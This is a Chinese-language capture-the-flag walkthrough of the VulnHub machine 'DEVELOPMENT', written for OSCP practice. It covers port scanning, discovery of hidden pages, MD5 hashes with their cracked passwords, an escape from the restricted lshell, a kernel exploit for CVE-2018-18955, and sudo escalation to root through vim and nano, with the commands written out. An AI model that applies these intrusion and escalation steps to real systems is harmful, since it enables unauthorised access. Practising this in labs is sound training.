OSCP_vulnhub digitalworld.local: DEVELOPMENT

news2024/12/29 8:06:22

DIGITALWORLD.LOCAL: DEVELOPMENT

    • 安装&环境
      • 下载
      • Description
    • 攻击
      • 寻找受害主机及端口服务
      • nmap就提示了ctrl u的内容,意思是有隐藏目录
      • 搜索slogin_lib.inc.php site:exploit-db.com
      • ubantu系统,4.15.0 查找版本漏洞
      • 第二种vim sudo提权
      • 第三种nano sudo提权

安装&环境

https://www.vulnhub.com/entry/digitalworldlocal-development,280/

下载

Download (Mirror): https://download.vulnhub.com/digitalworld/devt-improved.7z

Description

Back to the Top
This machine reminds us of a DEVELOPMENT environment: misconfigurations rule the roost. This is designed for OSCP practice, and the original version of the machine was used for a CTF. It is now revived, and made slightly more nefarious than the original.

If you MUST have hints for this machine (even though they will probably not help you very much until you root the box!): Development is (#1): different from production, (#2): a mess of code, (#3): under construction.

Note: Some users report the box may seem to be "unstable" with aggressive scanning. The homepage gives a clue why.

Feel free to contact the author at https://donavan.sg/blog if you would like to drop a comment.

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
受害主机安装好后登不进去

攻击机kali: 192.168.132.139
寻找受害机
nmap -A -P 192.168.132.0/24

攻击

寻找受害主机及端口服务

nmap -A -P 1-65535 192.168.132.141
发现端口

22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA)
|_  256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519)
113/tcp  open  ident?
|_auth-owners: oident
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: root
445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
|_auth-owners: root
8080/tcp open  http-proxy  IIS 6.0

22想到ssh登录,8080是web,进去搜集信息,139 445是smb搜敏感文件
在这里插入图片描述

nmap就提示了ctrl u的内容,意思是有隐藏目录

内容里的路径html_pages就是

http://192.168.132.141:8080/html_pages
在这里插入图片描述

http://192.168.132.141:8080/development.html

Security by obscurity is one of the worst ways one can defend from a cyberattack. This assumes that the adversary is not smart enough to be able to detect weak points in a corporate network.

An example of security by obscurity is in the local of webpages. For instance, IT administrators like to insert backdoors into applications for remote management, sometimes without the project teams knowing.

Once I worked on an implementation whereby the developer added a backdoor which was aptly named "hackersecretpage". It was hilarious because it contained a link to a file upload function, where the hacker installed a VNC viewer to perform remote desktop management!

A pity Patrick claims to be a security advocate, but isn't one. Hence, I shall secretly write in pages to guide hackers to make Patrick learn his lesson the hard way.

“hackersecretpage”. It was hilarious because it contained a link to a file upload function, where the hacker installed a VNC viewer to perform remote desktop management!
hackersecretpage”。这很滑稽,因为它包含一个文件上传功能的链接,黑客在那里安装了一个VNC查看器来执行远程桌面管理!

http://192.168.132.141:8080/hackersecretpage为空

view-source:http://192.168.132.141:8080/development.html

在这里插入图片描述

http://192.168.132.141:8080/developmentsecretpage/patrick.php
Click here to log out.
跳转到http://192.168.132.141:8080/developmentsecretpage/sitemap.php?logout=1
在这里插入图片描述

输入admin 123456
跳转http://192.168.132.141:8080/developmentsecretpage/patrick.php
在这里插入图片描述
报错
developmentsecretpage/slogin_lib.inc.php

搜索slogin_lib.inc.php site:exploit-db.com

发现漏洞链接https://www.exploit-db.com/exploits/7444

[0x02] Bug:[Remote File Inclusion]

[0x03] Bug:[Sensitive Data Disclosure]

然后访问http://192.168.1.106/developmentsecretpage/slog_users.txt,发现用户名和密码。

admin, 3cb1d13bb83ffff2defe8d1443d3a0eb
intern, 4a8a2b374f463b7aedbb44a066363b81
patrick, 87e6d56ce79af90dbe07d387d3d0579e
qiu, ee64497098d0926d198f54f6d5431f98

能解出的

intern:12345678900987654321
patrick:P@ssw0rd25
qiu:qiu

md5解密
http://md5.cn/

admin, 3cb1d13bb83ffff2defe8d1443d3a0eb, #解不出来
intern, 4a8a2b374f463b7aedbb44a066363b81,12345678900987654321
patrick, 87e6d56ce79af90dbe07d387d3d0579e,P@ssw0rd25
qiu, ee64497098d0926d198f54f6d5431f98,qiu

使用ssh登录intern
在这里插入图片描述
进来后shell什么命令都无法执行
在这里插入图片描述
限制shell,网上科普资料
https://www.aldeid.com/wiki/Lshell

echo os.system('/bin/bash')
echo && 'bash'

(绕过Lshell后输入env查看SHELL参数值,发现果然是lshell)
在这里插入图片描述

ubantu系统,4.15.0 查找版本漏洞

In the Linux kernel 4.15.x through 4.19.x before 4.19.2,…
CVE-2018-18955/

git clone https://github.com/bcoles/kernel-exploits.git
cd kernel-exploits
cd CVE-2018-18955

在这里插入图片描述
直接就是root

第二种vim sudo提权

进入到/home目录发现除了intern还有用户admin和patrick
admin的密码不知道,patrick的密码是知道的(md5解密),用su命令切换到patrick

su - patrick
执行sudo -l发现patrick可以sudo执行vim和nano,这两个命令都可以sudo提权

在这里插入图片描述

vim提权方法如该网页所示
https://gtfobins.github.io/gtfobins/vim/#sudo

命令行输入

sudo vim -c ‘:!/bin/bash’
在这里插入图片描述

即可得到root的shell

第三种nano sudo提权

nano是Unix和类Unix系统中的一个文本编辑器,我们也可以利用它来提权:
知识链接
https://gtfobins.github.io/gtfobins/nano/#sudo

在这里插入图片描述

nano
Ctrl + R
Ctrl + X 
reset; sh 1>&0 2>&0

enter
enter
id
whoami
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/154631.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【前端修炼场】— table 表格的构建

此文为【前端修炼场】第七篇,上一篇文章链接:超链接 文章目录前言一、table 表格的引入二、table 表格属性2.1 边框( border )2.2 宽度( width )2.3 高度( height )2.4 水平对齐( align"left 或 right 或 center )2.5 单元格间距( cellspacing)2.6 …

极客时间学习笔记:04芯片-设计之路

其实一颗芯片项目就是一个标准的产品项目,项目的起点是市场需求分析,接着是设计和制造,如果产品成功完成了商业落地,那么就可以开启下一代产品的迭代升级新周期了。 如果只看芯片设计,它主要包含需求分析、架构设计、逻…

基于Openl启智平台如何提交代码至远程仓库

基于Openl启智平台如何提交代码至远程仓库Openl启智简介快速创建项目克隆项目到本地提交和更新文件Openl启智简介 面向新一代人工智能开源共性技术,面向AI领域的一站式协同开发环境,提供集代码开发环境,数据管理、模型调试、推理和评测为一体…

【Linux】常用基本指令(始)

文章目录🎪 Linux下基本指令1.1 🚀 登录相关指令1.2 🚀 ls1.3 🚀 pwd1.4 🚀 cd1.5 🚀 touch1.6 🚀mkdir1.7 🚀rmdir && rm1.8 🚀man1.9 🚀cp2.0 &…

windows环境使用PHPStudy安装Redis

windows环境使用PHPStudy安装Redis 目录 安装Redis 开启php redis扩展 查看php扩展 启动redis 连接测试 总结 安装Redis 从软件管理中找到redis,点击安装 开启php redis扩展 选择相应网站管理 > php扩展> redis 查看是否勾选,如果未勾…

力扣刷题记录——412. Fizz Buzz、414. 第三大的数、415. 字符串相加

本专栏主要记录力扣的刷题记录,备战蓝桥杯,供复盘和优化算法使用,也希望给大家带来帮助,博主是算法小白,希望各位大佬不要见笑,今天要分享的是——《412. Fizz Buzz、414. 第三大的数、415. 字符串相加》。…

ccc-sklearn-15-XGBoost(1)

文章目录XGBoost集成算法介绍xgboost 库与sklearn中的XGB APIXGBoost的三大板块梯度提升树-集成算法参数n_estimators建模使用sklearn中的XBGboost:参数subsample使用波士顿房价数据集,来看学习曲线参数eta探索eta参数的性质n_estimators,lea…

【操作系统实验/Golang】实验2:进程(线程)同步

1 实验问题描述以生产者-消费者模型为基础,在Windows环境下创建一个控制台进程,在该进程中创建读者写者线程模拟生产者和消费者。Writer线程写入数据,然后将数据放置在一个空缓冲区buffer中供Reader线程读取。Reader线程从缓冲区中获得数据&a…

YOLOv5+Tesseract-OCR 实现车牌号文本识别

来源:投稿 作者:王同学 编辑:学姐 最近看到了各种各样的车牌识别,觉得挺有意思,自己也简单搞一个玩玩。 1.预期效果2.整体流程3.准备数据集4.训练YOLOv5模型 4.1 下载源码 4.2 安装环境 4.3 修改配置文件 4.4 训练模型…

史上最详python中while语句循环(建议收藏)

名字:阿玥的小东东 学习:python正在学习c 主页:阿玥的小东东 目录 前言 1. 什么是while语句? 2. while语句可以干啥吖 3.while的详细讲解 4.死循环 5.用while语句写个小游戏 前言 今天呢我们来学习一下python中的while语句 …

「Moonbeam社区之声」首期活动回顾

感谢大家参加本次Moonbeam Community Voice「社区之声」新系列活动。Moonbeam计划定期举行这个系列活动,分享Moonbeam社区近期状况,以及来自社区的建议和分享。顾名思义,这是基于社区的分享活动。 Community Voice「社区之声」旨在成为讨论影…

第8章:切片

1.切片的引入 【1】切片(slice)是golang中一种特有的数据类型 【2】数组有特定的用处,但是却有一些呆板(数组长度固定不可变),所以在 Go 语言的代码里并不是特别常见。相对的切片却是随处可见的,切片是一种建立在数组类型之上的抽象&#xf…

AVL平衡树

前置知识 平衡树 平衡树指的是任意节点的子树的高度差都小于等于 111 的二叉查找树。 因为他是平衡的,我们做树上的操作就可以降到 O(logn)O(log_n)O(logn​) 的时间复杂度。 AVL平衡树 因为对于树有可能进行插入或删除操作,使得树有可能不平衡&…

抓取HTTPS失败和乱码

第一步:电脑安装SSL证书 选择 “Help” -> “SSL Proxying” -> “Install Charles Root Certificate”,如果设置了安全防护,会ranging输入系统的帐号密码 这时开始安装charles证书,一路点击下一步即可 第二步&#xf…

【MySQL进阶教程】锁的详细介绍

前言 本文为 【MySQL进阶教程】锁 相关知识,下边将对锁的概述,全局锁(包含全局锁的介绍,语法与特点),表级锁(包含表级锁的介绍,表锁,元数据锁,意向锁&#xf…

第一封信|感觉孤独?找个借口联系

首发:https://bornforthis.cn/letter/2023/01.html 孤独不等于寂寞 你好,我是悦创。 这里是《悦创来信去无方向的信》,给你邮寄的第一封信,信的主题是“孤独 vs 寂寞”,很高兴你拆开此信。 一到冬季,情…

10条必备的markdown常用语法

10条必备的markdown常用语法markdown笔记写起来会比较方便,而且也方便复制,下面我总结一下常用的markdown常用语法可能不同的程序markdown语法不太一样,但是都差不多的1.标题一级标题、二级标题等等这个不多说了。最多支持六级标题## 内容1 …

鲲志说:向我跌宕起伏,喜忧参半的2022致敬!

今天是2022的倒数第二天,就着CSDN的活动正好为自己做一个年度总结,也确实需要做一个年度总结来正式和过去的一年道个别 回想这一年,确实经历了很多,寒冬裁员、千里相赴见双方父母、成功夺冠🐑。。。成年人的世界确实很…

Web3中文|2023加密圈开年首雷?美国当局调查Genesis母公司DCG

据彭博社周五报道,纽约联邦检察官和美国证券交易委员会(SEC)正在调查数字货币集团(DCG)在其借贷子公司Genesis的内部转账问题。 报道援引知情人士的话称,DCG已收到纽约东区检察官关于提供文件和面谈的要求…

ebpf中的percpu map的注意事项与剖析

1 背景 故事还要从一次翻车现场说起。 为了统计各个CPU上的系统调用数据按照cpu分别进行统计,我参考了kernel Documents中关于percpu map的一段原话: Values stored in BPF_MAP_TYPE_ARRAY can be accessed by multiple programs across different CPUs.…